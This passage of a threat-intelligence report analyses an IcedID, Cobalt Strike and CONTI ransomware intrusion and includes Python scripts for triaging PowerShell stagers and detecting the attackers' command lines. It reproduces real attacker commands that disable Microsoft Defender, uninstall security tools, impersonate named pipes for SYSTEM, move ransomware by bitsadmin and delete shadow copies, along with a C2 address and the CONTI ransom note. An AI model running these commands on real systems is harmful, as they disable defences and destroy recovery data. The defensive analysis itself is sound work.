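    """Run all three stages and return what an analyst wants at a glance."""
    outer = decode_encoded_command(encoded_command)
    doit = unwrap_gzip_stage(outer)
    shellcode = extract_shellcode(doit)
    return {
        "gzip_wrapped": "GzipStream" in outer,
        # 0x40 is PAGE_EXECUTE_READWRITE in the VirtualAlloc call
        "allocates_rwx": "VirtualAlloc" in doit and "0x40" in doit,
        "shellcode_len": len(shellcode),
        # FC E8 = cld; call, the usual opening of x86 stager shellcode
        "x86_stager_prologue": shellcode[:2] == b"\xfc\xe8",
        "shellcode": shellcode,
    }


def build_constructed_sample() -> str:
    """Construct a harmless fixture with the same three layers; the 'shellcode'
    is marker text, not executable code, so triage() can be exercised offline."""
    fake_code = b"\xfc\xe8" + b"CONSTRUCTED SAMPLE - NOT SHELLCODE"
    inner_b64 = base64.b64encode(bytes(b ^ XOR_KEY for b in fake_code)).decode()
    doit = (
        "Set-StrictMode -Version 2\n"
        "[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
        "for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code[$x] = $var_code[$x] -bxor 35 }\n"
        "$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)  # VirtualAlloc\n"
    ) % inner_b64
    outer_b64 = base64.b64encode(gzip.compress(doit.encode("utf-8"))).decode()
    outer = (
        '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
    ) % outer_b64
    return base64.b64encode(outer.encode("utf-16-le")).decode()


if __name__ == "__main__":
    report = triage(build_constructed_sample())
    print({k: v for k, v in report.items() if k != "shellcode"})
```

For a real capture, pass the value that followed -encodedcommand to triage(); the shellcode bytes it returns can then be handed to an emulator or string extraction.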

The decrypted shellcode (raw binary dump omitted here) begins with the usual x86 stager prologue (0xFC 0xE8, cld; call) and contains the stager’s HTTP request in clear text. Readable strings recovered from the dump:

Host: code.jquery.com

Connection: close

Accept: */*

Accept-Encoding: gzip, br

User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2832.7 Safari/537.36

23.108.57.148

Note that the Host header names code.jquery.com while the connection is made to the C2 address 23.108.57.148, so the request is dressed up to look like a jQuery CDN fetch.

Cobalt Strike C2 server:
23.108.57[.]148

After the fileless injection with PowerShell, the threat actor performed an additional injection into a remote process, utilizing a reflective injection technique.

PowerShell opened Handle 0x143A to svchost.exe

Target process:
C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup

The injected svchost executed a PowerShell command, which performed a discovery operation.

Powershell -nop -exec bypass -EncodedCommand IgBbAFMAeQBzAHQAZQBtAC4ARABpAHIAZQBjAHQAbwByAHkAUwBlAHIAdgBpAGMAZQBzAC4AQQBjAHQAaQB2AGUARABpAHIAZQBjAHQAbwByAHkALgBEAG8AbQBhAGkAbgBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuACgAKQAuAEQAbwBtAGEAaQBuAEMAbwBuAHQAcgBvAGwAbABlAHIAcwAgAHwAIABTAGUAbABlAGMAdAAgAC0AcAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQAsAEkAUABBAGQAZAByAGUAcwBzACwATwBTAFYAZQByAHMAaQBvAG4AIgA=

Decoded command:

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select -property Name,IPAddress,OSVersion

Discovery

Back to the IcedID use case: several commands used by the Cobalt Strike session for discovery were detected.

Discovery – TA0007

“The adversary is trying to figure out your environment.

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.”

Discovery commands:

ipconfig /displaydns

ipconfig /all

nltest /domain_trusts

nltest /domain_trusts /all_trusts

systeminfo

net view /all /domain

wmic product get name,version

The above discovery command lists the applications installed on the host. We have observed threat actors using it to discover which security applications they are dealing with.

The following command prints the installation package.

wmic product where "Name like '%Security Application%'" get Name, IdentifyingNumber

Impair defenses

After that, an attempt was made to uninstall the security application via the msiexec command:

msiexec.exe /x {[ security application package]} /qn

msiexec.exe /x {[ security application package]} /qn PASSWORD=[password]

In addition, an “Impair Defenses: Disable or Modify Tools” – T1562.001 technique was used to disable Microsoft Defender.

powershell New-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

powershell Uninstall-WindowsFeature -Name Windows-Defender

powershell Set-MpPreference -DisableRealtimeMonitoring $true

We have also observed privilege escalation in cases of Cobalt Strike activity by IcedID actors. The privilege escalation was achieved by GetSystem named pipe impersonation to gain SYSTEM-level privileges.

C:\Windows\system32\cmd.exe /c echo fbe08e37b62 > \\.\pipe\ab59fc

C:\Windows\system32\cmd.exe /c echo 99269f2c2e0 > \\.\pipe\4bba0e

C:\Windows\system32\cmd.exe /c echo fe08a9c446f > \\.\pipe\254573

C:\Windows\system32\cmd.exe /c echo 849b1389e6a > \\.\pipe\e215fc

C:\Windows\system32\cmd.exe /c echo [Random 11 characters] > \\.\pipe\[Random 6 characters]

Hunting tip: the above GetSystem command pattern can help detect a privilege escalation attempt via named pipe. In addition, the cmd command is executed by the services.exe process, which can serve as a second indicator.

“Technique 1 creates a named pipe from Meterpreter. It also creates and runs a service that runs cmd.exe /c echo “some data” >\\.\pipe\. When the spawned cmd.exe connects to Meterpreter’s named pipe, Meterpreter can impersonate that security context. Impersonation of clients is a named pipes feature. The context of the service is SYSTEM, so when you impersonate it, you become SYSTEM.” – Cobalt Strike
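An added example (not from the report): Python detection logic for two command-line patterns documented on this page, the IcedID loader invocation “rundll32 ..\<name>.<random ext>,DllRegisterServer” (and its regsvr32 variant registering a non-DLL file) from the Defense evasion section, and the GetSystem “cmd.exe /c echo <11 chars> > \\.\pipe\<6 chars>” pattern with a services.exe parent. The events are constructed samples modelled on the lines above.

```python
import re
from typing import Dict, List, Tuple

DLL_EXTENSIONS = {".dll", ".ocx", ".cpl", ".ax"}

# Pattern 1: the loader invocation as seen in the detections above, e.g.
#   rundll32 ..\Hikos.hertolo1,DllRegisterServer
# relative path, arbitrary extension, DllRegisterServer export called by name.
RUNDLL_RE = re.compile(
    r'^\s*"?(?:[A-Za-z]:\\[^"\s]*\\)?rundll32(?:\.exe)?"?\s+\.\.\\(?P<module>[^\s,]+)\s*,\s*DllRegisterServer\s*$',
    re.IGNORECASE,
)

# Pattern 2: the regsvr32 variant, e.g. regsvr32.exe c:\users\public\globalStorage.jpg
REGSVR_RE = re.compile(
    r'^\s*"?(?:[A-Za-z]:\\[^"\s]*\\)?regsvr32(?:\.exe)?"?\s+(?:/[sn]\s+)*(?P<module>[^\s"]+)"?\s*$',
    re.IGNORECASE,
)

# Pattern 3: Cobalt Strike GetSystem named pipe impersonation, e.g.
#   C:\Windows\system32\cmd.exe /c echo fbe08e37b62 > \\.\pipe\ab59fc
# (11-character token echoed into a 6-character pipe; the samples above are lowercase hex)
GETSYSTEM_RE = re.compile(
    r'cmd(?:\.exe)?"?\s+/c\s+echo\s+(?P<data>[0-9a-f]{11})\s*>\s*\\\\\.\\pipe\\(?P<pipe>[0-9a-f]{6})\s*$',
    re.IGNORECASE,
)


def _extension(path: str) -> str:
    """Lower-cased extension of the last path component ('' if none)."""
    name = path.rsplit("\\", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def classify(event: Dict[str, str]) -> List[str]:
    """Return detection tags for one process-creation event (empty list = clean)."""
    tags: List[str] = []
    cmd = event.get("cmdline", "")
    parent = event.get("parent_image", "").lower()

    m = RUNDLL_RE.match(cmd)
    if m:
        tags.append("rundll32_relative_dllregisterserver")
        if _extension(m.group("module")) not in DLL_EXTENSIONS:
            tags.append("non_dll_extension")

    m = REGSVR_RE.match(cmd)
    if m and _extension(m.group("module")) not in DLL_EXTENSIONS:
        tags.append("regsvr32_non_dll_extension")

    if GETSYSTEM_RE.search(cmd):
        tags.append("getsystem_named_pipe")
        # the echo is launched by a service created for the purpose, so services.exe is the parent
        if parent.endswith("services.exe"):
            tags.append("getsystem_parent_services")
    return tags


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (cmdline, tags) for every event that produced at least one tag."""
    hits = []
    for event in events:
        tags = classify(event)
        if tags:
            hits.append((event["cmdline"], tags))
    return hits


# Constructed process-creation events modelled on the command lines in this report.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE",
     "cmdline": r"rundll32 ..\Hikos.hertolo1,DllRegisterServer"},
    {"parent_image": r"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Windows\System32\regsvr32.exe" c:\users\public\globalStorage.jpg'},
    {"parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c echo fbe08e37b62 > \\.\pipe\ab59fc"},
    # benign controls: absolute path to a real DLL, ordinary self-registration
    {"parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\mshtml.dll"},
]

if __name__ == "__main__":
    for cmdline, tags in scan(SAMPLE_EVENTS):
        print(tags, "<-", cmdline)
```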

After the threat actors enumerated the compromised host, mapped the domain, disabled the security applications and gained SYSTEM privileges, the impact stage is ready.

Final stage – CONTI infection

For the lateral movement and distribution of CONTI ransomware, threat actors used C$ share.

bitsadmin /transfer debjob /download /priority normal \\*\C$\Windows\md.dll C:\Windows\GROUP_x86.dll

The above command is a LOLBin abuse of bitsadmin (the Background Intelligent Transfer Service management tool) to transfer the CONTI ransomware DLL over the C$ share.

The execution method used to execute the CONTI DLL was regsvr32 command.

c:\windows\syswow64\regsvr32.exe /s C:\Windows\GROUP_x86.dll

Cynet 360 has a ransomware heuristics mechanism, one of whose actions is to deploy decoy files. Using this mechanism, we observed the CONTI ransomware encryption routine attempting to encrypt the decoys:

\device\harddiskvolume4\*\29.xlsx.ahiod

\device\harddiskvolume4\*\10.jpg.ahiod

\device\harddiskvolume4\*\14.xlsx.ahiod

\device\harddiskvolume4\*\15.jpg.ahiod

\device\harddiskvolume4\*\19.xlsx.ahiod

\device\harddiskvolume4\*\2.docx.ahiod

\device\harddiskvolume4\*\20.jpg.ahiod

\device\harddiskvolume4\*\24.xlsx.ahiod

\device\harddiskvolume4\*\25.jpg.ahiod

\device\harddiskvolume4\*\28.xls.ahiod

Inhibit-recovery commands detected during the CONTI infection prevent system recovery by deleting volume shadow copies using vssadmin:

vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB

vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded

vssadmin.exe delete shadows /all /quiet

The threat actors executed the shadow copy deletion commands manually in most cases through bat files. This action of deleting shadow copies, not via the ransomware functionality itself, is a new development in the last incidents. We suspect that this action was performed manually to impede the detection of the inhibiting recovery technique. The shadow copy deletion commands are not directly related to the ransomware activity in this execution method and could be similar to legitimate activity originated from administrators and 3rd party applications.

CONTI utilizes Windows Restart Manager to ensure the data files are ready for encryption and there is no opened handle to the targeted files by other processes, and if so, the CONTI ransomware terminates these processes. The same technique is used by Sodinokibi (A.K.A REvil) and Ryuk ransomware.

CONTI Ransomware note:

Readme.txt
All of your files are currently encrypted by CONTI strain.

As you know (if you don’t – just “google it”), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly.

If you try to use any additional recovery software – the files might be damaged, so if you are willing to try – try it on the data of the lowest value.

To make sure that we REALLY CAN get your data back – we offer you to decrypt 2 random files completely free of charge.

You can contact our team directly for further instructions through our website :

TOR VERSION :

(you should download and install TOR browser first https://torproject.org)

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION :

https://contirecovery.top/

YOU SHOULD BE AWARE!

Just in case, if you try to ignore us. We’ve downloaded a pack of your internal data and are ready to publish it on our news website if you do not respond. So it will be better for both sides if you contact us as soon as possible.

—BEGIN ID—

BPajYEaqdfDw5vci8nffGNO7URl8sq3U4hLbVnIFfMoIrf8yuwZDqq7SwLQggU1i

—END ID—

The CONTI group recently started using a “double extortion” technique, threatening victims that the exfiltrated data will be publicly leaked. This is a new trend amongst threat actors that used to focus ransomware campaigns and attacks solely on data encryption, but have evolved and created an additional leverage and source of income.

CONTI sample analysis

MD5: a39aed88ea19af29a6876e74422e6e05

SHA-256: 5fe77db174a5206b5387e2b86255bd008966b44632925351d9b3983438004eb1

Imphash: 749dc5143e9fc01aa1d221fb9a48d5ea

SSDEEP: 3072:zKA/+tFAQDsFRa03B6jD3MIKud2nLxFVuyrUK8a1vFwS:WA/+t6QDsL3kjD3UjfVHmS

File type: Win32 DLL

Magic: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

Entropy: 6.454

Execution with regsvr32:

Parent Process:
c:\users\syswow64\regsvr32.exe /s C:\users\user\Desktop\CONTI.dll
Child Process Command:
/s C:\users\user\Desktop\CONTI.dll

File encryption:

CreateFile

QueryBasicInformationFile

CloseFile